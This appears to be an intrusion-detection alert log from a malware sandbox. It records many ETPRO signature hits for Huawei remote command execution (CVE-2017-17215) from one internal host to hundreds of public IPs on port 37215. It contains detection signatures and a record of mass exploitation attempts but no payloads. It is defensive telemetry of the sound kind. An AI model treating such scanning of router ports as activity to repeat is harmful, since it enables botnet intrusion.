                                                    07/10/24-08:27:36.290826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773837215192.168.2.1486.59.214.156
                                                    07/10/24-08:26:59.766044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631037215192.168.2.14170.157.166.171
                                                    07/10/24-08:26:55.366131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268037215192.168.2.1441.154.66.43
                                                    07/10/24-08:26:55.354961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362637215192.168.2.14157.113.225.174
                                                    07/10/24-08:27:22.890636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643237215192.168.2.14197.71.189.169
                                                    07/10/24-08:27:13.976199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915437215192.168.2.14152.120.141.42
                                                    07/10/24-08:26:33.247887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059637215192.168.2.14157.106.195.205
                                                    07/10/24-08:27:27.175137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652237215192.168.2.14157.169.66.107
                                                    07/10/24-08:26:41.539948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866037215192.168.2.1466.133.245.198
                                                    07/10/24-08:26:25.430749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406037215192.168.2.14197.125.110.149
                                                    07/10/24-08:27:13.961698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776837215192.168.2.1441.98.10.12
                                                    07/10/24-08:27:17.092016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813037215192.168.2.14197.84.107.146
                                                    07/10/24-08:26:23.330913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091637215192.168.2.14157.203.251.88
                                                    07/10/24-08:26:55.406931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473237215192.168.2.1441.109.24.151
                                                    07/10/24-08:27:10.679759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414637215192.168.2.14197.100.96.50
                                                    07/10/24-08:26:33.259688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009437215192.168.2.14157.83.187.151
                                                    07/10/24-08:26:31.058649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289037215192.168.2.14157.68.153.193
                                                    07/10/24-08:27:22.891775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703237215192.168.2.1423.92.189.145
                                                    07/10/24-08:26:29.746967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996637215192.168.2.14197.144.222.162
                                                    07/10/24-08:27:28.064237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941837215192.168.2.14197.131.106.57
                                                    07/10/24-08:26:55.313127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454837215192.168.2.14130.133.41.0
                                                    07/10/24-08:27:19.265818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892037215192.168.2.1441.73.188.228
                                                    07/10/24-08:26:57.636057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816037215192.168.2.14197.21.50.249
                                                    07/10/24-08:27:07.290610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421037215192.168.2.14197.169.142.132
                                                    07/10/24-08:27:11.540187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719437215192.168.2.14197.101.104.3
                                                    07/10/24-08:27:32.490587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896837215192.168.2.1444.67.38.48
                                                    07/10/24-08:26:42.422787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074837215192.168.2.14147.124.220.153
                                                    07/10/24-08:26:11.609445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320437215192.168.2.14123.131.134.210
                                                    07/10/24-08:26:28.789365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922637215192.168.2.14182.126.63.204
                                                    07/10/24-08:27:13.993407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392237215192.168.2.14197.248.143.71
                                                    07/10/24-08:27:10.631591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678837215192.168.2.14100.169.223.233
                                                    07/10/24-08:27:02.743093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001837215192.168.2.14157.48.157.12
                                                    07/10/24-08:26:59.623766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212037215192.168.2.1441.42.141.113
                                                    07/10/24-08:26:11.515287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707037215192.168.2.14197.159.156.241
                                                    07/10/24-08:26:47.986495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355437215192.168.2.14157.203.240.201
                                                    07/10/24-08:27:07.380446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013637215192.168.2.14155.218.12.165
                                                    07/10/24-08:26:11.144777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356237215192.168.2.14172.2.237.22
                                                    07/10/24-08:26:31.081032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089037215192.168.2.1427.80.117.186
                                                    07/10/24-08:26:15.882242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492837215192.168.2.14197.72.20.53
                                                    07/10/24-08:27:30.456446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428237215192.168.2.1441.114.136.227
                                                    07/10/24-08:27:08.365317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055237215192.168.2.1441.138.119.236
                                                    07/10/24-08:26:36.378421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803037215192.168.2.14183.134.157.226
                                                    07/10/24-08:26:47.900584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087837215192.168.2.1441.191.166.23
                                                    07/10/24-08:26:38.559907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370837215192.168.2.14197.131.57.98
                                                    07/10/24-08:26:38.633686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391837215192.168.2.1441.173.104.75
                                                    07/10/24-08:27:19.298616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321637215192.168.2.1441.159.187.153
                                                    07/10/24-08:27:05.146612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.14157.235.208.253
                                                    07/10/24-08:26:36.420530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954037215192.168.2.14157.221.190.30
                                                    07/10/24-08:26:29.752845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879037215192.168.2.14197.223.156.47
                                                    07/10/24-08:26:28.784131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002037215192.168.2.1477.215.236.165
                                                    07/10/24-08:27:17.005251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663037215192.168.2.14142.232.160.167
                                                    07/10/24-08:26:25.460773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449437215192.168.2.1435.39.127.140
                                                    07/10/24-08:26:59.524945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244837215192.168.2.14157.94.129.192
                                                    07/10/24-08:27:17.071295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520037215192.168.2.14157.221.246.75
                                                    07/10/24-08:27:30.487311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893637215192.168.2.1441.43.36.105
                                                    07/10/24-08:26:36.433221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551637215192.168.2.1434.234.131.23
                                                    07/10/24-08:26:20.156560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443637215192.168.2.142.119.205.203
                                                    07/10/24-08:26:57.675135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557637215192.168.2.1441.237.32.75
                                                    07/10/24-08:26:48.009787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4460837215192.168.2.1441.103.221.226
                                                    07/10/24-08:27:14.815899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773237215192.168.2.1441.158.156.252
                                                    07/10/24-08:26:18.005995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959837215192.168.2.14157.50.74.82
                                                    07/10/24-08:26:29.824818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112037215192.168.2.14157.103.54.18
                                                    07/10/24-08:27:05.121816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819637215192.168.2.14157.163.124.69
                                                    07/10/24-08:27:10.635784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491637215192.168.2.14197.137.39.0
                                                    07/10/24-08:26:49.775656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390837215192.168.2.1441.221.182.176
                                                    07/10/24-08:26:11.583126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370637215192.168.2.142.247.127.226
                                                    07/10/24-08:27:13.968872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874637215192.168.2.1441.219.83.160
                                                    07/10/24-08:26:20.187886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854037215192.168.2.14222.222.146.30
                                                    07/10/24-08:27:13.995409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336037215192.168.2.1441.105.112.68
                                                    07/10/24-08:26:43.631742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420837215192.168.2.14157.192.189.53
                                                    07/10/24-08:26:45.587142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050237215192.168.2.1441.138.104.14
                                                    07/10/24-08:26:43.713533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091237215192.168.2.14197.136.2.181
                                                    07/10/24-08:26:59.541812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739837215192.168.2.14197.101.63.63
                                                    07/10/24-08:26:18.029316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238637215192.168.2.1441.239.89.202
                                                    07/10/24-08:26:20.080140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073037215192.168.2.14197.201.142.164
                                                    07/10/24-08:27:10.583365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462037215192.168.2.14197.127.137.133
                                                    07/10/24-08:26:17.999784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719837215192.168.2.1465.88.78.185
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833637215192.168.2.14197.200.192.97
                                                    07/10/24-08:26:18.015608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770237215192.168.2.14110.56.71.160
                                                    07/10/24-08:26:20.159669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623637215192.168.2.14101.247.125.246
                                                    07/10/24-08:26:41.356703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431237215192.168.2.1481.33.102.159
                                                    07/10/24-08:26:25.456232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420837215192.168.2.14197.182.17.105
                                                    07/10/24-08:27:13.983145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721637215192.168.2.14157.213.181.177
                                                    07/10/24-08:26:11.165581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113637215192.168.2.1474.101.176.184
                                                    07/10/24-08:26:49.792621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821037215192.168.2.1441.146.134.227
                                                    07/10/24-08:27:32.479607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287437215192.168.2.14191.97.197.11
                                                    07/10/24-08:27:30.402318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637037215192.168.2.1441.29.30.179
                                                    07/10/24-08:27:33.934356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4187437215192.168.2.1441.193.148.245
                                                    07/10/24-08:27:30.417770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797437215192.168.2.14173.173.140.123
                                                    07/10/24-08:27:10.666062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4323837215192.168.2.14157.69.163.63
                                                    07/10/24-08:27:14.888745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735637215192.168.2.14197.81.100.185
                                                    07/10/24-08:27:27.153335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170437215192.168.2.14197.84.27.217
                                                    07/10/24-08:26:22.218998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936237215192.168.2.1435.0.14.219
                                                    07/10/24-08:26:59.883274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4871037215192.168.2.14197.219.115.237
                                                    07/10/24-08:27:27.174460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370837215192.168.2.14197.255.188.154
                                                    07/10/24-08:26:34.217028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850837215192.168.2.1441.90.118.153
                                                    07/10/24-08:27:08.405574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4417437215192.168.2.14197.198.184.81
                                                    07/10/24-08:26:41.525899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065437215192.168.2.14221.164.96.121
                                                    07/10/24-08:26:47.906246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358837215192.168.2.1441.237.96.174
                                                    07/10/24-08:26:28.844720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868037215192.168.2.14157.86.195.60
                                                    07/10/24-08:27:30.505741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507237215192.168.2.14157.85.127.6
                                                    07/10/24-08:27:22.848965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123637215192.168.2.14157.34.176.36
                                                    07/10/24-08:27:24.956941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093637215192.168.2.14157.100.194.150
                                                    07/10/24-08:26:41.553894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911637215192.168.2.14157.101.153.78
                                                    07/10/24-08:26:25.467612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793837215192.168.2.14157.104.23.224
                                                    07/10/24-08:26:41.494143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421237215192.168.2.1458.98.216.189
                                                    07/10/24-08:27:28.140303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582437215192.168.2.1441.197.218.203
                                                    07/10/24-08:26:42.179798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369037215192.168.2.1441.57.117.150
                                                    07/10/24-08:27:24.995730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073037215192.168.2.1427.124.186.107
                                                    07/10/24-08:26:57.530993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839437215192.168.2.1441.123.90.188
                                                    07/10/24-08:26:33.251100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684637215192.168.2.1441.109.240.81
                                                    07/10/24-08:26:42.345692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915837215192.168.2.14197.139.47.110
                                                    07/10/24-08:26:55.423552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805637215192.168.2.1441.100.25.154
                                                    07/10/24-08:26:13.780678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430437215192.168.2.1438.16.177.91
                                                    07/10/24-08:27:16.998730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5807237215192.168.2.14197.245.157.42
                                                    07/10/24-08:26:33.171308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988037215192.168.2.14197.159.236.34
                                                    07/10/24-08:26:29.797142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182837215192.168.2.1441.253.90.182
                                                    07/10/24-08:26:38.648548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246237215192.168.2.14157.239.115.113
                                                    07/10/24-08:26:20.168869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678637215192.168.2.1441.42.29.191
                                                    07/10/24-08:26:43.645896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724237215192.168.2.1441.18.233.143
                                                    07/10/24-08:26:49.802589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368237215192.168.2.1441.49.93.8
                                                    07/10/24-08:27:22.839204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812837215192.168.2.14197.186.182.196
                                                    07/10/24-08:27:08.446454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975437215192.168.2.1441.135.23.90
                                                    07/10/24-08:26:57.528715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289037215192.168.2.14157.113.184.21
                                                    07/10/24-08:26:55.366131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351637215192.168.2.1443.30.4.234
                                                    07/10/24-08:27:23.786219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648837215192.168.2.14165.127.119.59
                                                    07/10/24-08:27:30.505029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298837215192.168.2.14157.212.129.175
                                                    07/10/24-08:26:48.000365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989837215192.168.2.14197.243.55.56
                                                    07/10/24-08:26:57.627051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253037215192.168.2.14157.96.217.199
                                                    07/10/24-08:27:19.315486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067637215192.168.2.14157.31.21.33
                                                    07/10/24-08:26:53.207005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928237215192.168.2.14157.236.205.11
                                                    07/10/24-08:26:59.596848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650437215192.168.2.1441.177.171.253
                                                    07/10/24-08:27:02.686169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994837215192.168.2.14197.5.129.235
                                                    07/10/24-08:27:07.327851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800037215192.168.2.14157.200.143.109
                                                    07/10/24-08:27:31.483215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727037215192.168.2.14197.14.106.7
                                                    07/10/24-08:27:31.534689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405037215192.168.2.1480.126.106.83
                                                    07/10/24-08:26:36.415941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211637215192.168.2.14208.67.19.134
                                                    07/10/24-08:27:27.151855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390237215192.168.2.1441.152.201.71
                                                    07/10/24-08:26:43.861312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539437215192.168.2.14197.252.5.28
                                                    07/10/24-08:26:36.418170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716637215192.168.2.1441.71.151.211
                                                    07/10/24-08:27:28.156575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974437215192.168.2.14165.222.62.79
                                                    07/10/24-08:26:42.381146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792437215192.168.2.14223.179.87.162
                                                    07/10/24-08:26:22.283618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583637215192.168.2.14157.134.245.224
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253037215192.168.2.14197.161.19.40
                                                    07/10/24-08:27:30.489960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892437215192.168.2.14157.223.223.122
                                                    07/10/24-08:27:32.556430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470237215192.168.2.14197.255.62.140
                                                    07/10/24-08:26:34.180916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851037215192.168.2.14157.193.211.69
                                                    07/10/24-08:26:41.628503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998637215192.168.2.1441.134.157.125
                                                    07/10/24-08:26:17.989369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215437215192.168.2.14197.204.112.81
                                                    07/10/24-08:26:26.483196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599637215192.168.2.1441.93.57.217
                                                    07/10/24-08:26:34.256446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318237215192.168.2.14157.24.64.170
                                                    07/10/24-08:27:13.867298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293637215192.168.2.1467.0.217.116
                                                    07/10/24-08:26:36.382964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918437215192.168.2.14157.65.178.11
                                                    07/10/24-08:27:13.837661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963437215192.168.2.14157.125.213.45
                                                    07/10/24-08:26:11.128878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536037215192.168.2.14197.225.238.55
                                                    07/10/24-08:26:42.353593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517037215192.168.2.1441.95.112.174
                                                    07/10/24-08:27:05.206516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218037215192.168.2.14217.52.185.108
                                                    07/10/24-08:26:57.557650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180237215192.168.2.1441.223.222.241
                                                    07/10/24-08:27:02.869680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855637215192.168.2.14197.7.246.1
                                                    07/10/24-08:27:07.389278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562637215192.168.2.1441.58.124.66
                                                    07/10/24-08:26:59.780112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436037215192.168.2.1441.142.189.36
                                                    07/10/24-08:26:25.418572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924637215192.168.2.1441.65.135.172
                                                    07/10/24-08:27:31.448470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953037215192.168.2.14157.60.25.245
                                                    07/10/24-08:26:28.900792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386037215192.168.2.14197.123.43.6
                                                    07/10/24-08:27:14.822336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300037215192.168.2.14197.252.85.214
                                                    07/10/24-08:27:22.828817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209837215192.168.2.14197.110.175.250
                                                    07/10/24-08:27:33.941322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467037215192.168.2.1441.207.248.40
                                                    07/10/24-08:26:23.309786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464437215192.168.2.1441.27.127.7
                                                    07/10/24-08:26:57.593724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442637215192.168.2.14197.235.177.84
                                                    07/10/24-08:27:27.122406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707437215192.168.2.14164.144.5.178
                                                    07/10/24-08:26:29.811396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812837215192.168.2.14157.125.228.229
                                                    07/10/24-08:27:10.638675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686037215192.168.2.1441.254.90.245
                                                    07/10/24-08:27:11.555900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412437215192.168.2.1459.114.104.163
                                                    07/10/24-08:27:19.250416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535637215192.168.2.1441.71.10.40
                                                    07/10/24-08:27:20.446313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.14141.63.71.55
                                                    07/10/24-08:27:10.767328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466237215192.168.2.1441.54.219.75
                                                    07/10/24-08:26:45.656574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251637215192.168.2.1441.247.247.252
                                                    07/10/24-08:26:53.198368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629437215192.168.2.14197.210.180.4
                                                    07/10/24-08:27:22.763927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556837215192.168.2.14197.113.141.14
                                                    07/10/24-08:26:59.639186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740837215192.168.2.1441.101.42.93
                                                    07/10/24-08:27:07.263619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093037215192.168.2.14157.82.17.22
                                                    07/10/24-08:27:24.959708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972437215192.168.2.14197.245.199.40
                                                    07/10/24-08:26:25.449676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579237215192.168.2.14197.40.14.135
                                                    07/10/24-08:26:55.302955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321637215192.168.2.1444.251.131.2
                                                    07/10/24-08:27:19.273246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319837215192.168.2.1441.62.173.64
                                                    07/10/24-08:26:45.598078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824037215192.168.2.14197.237.178.102
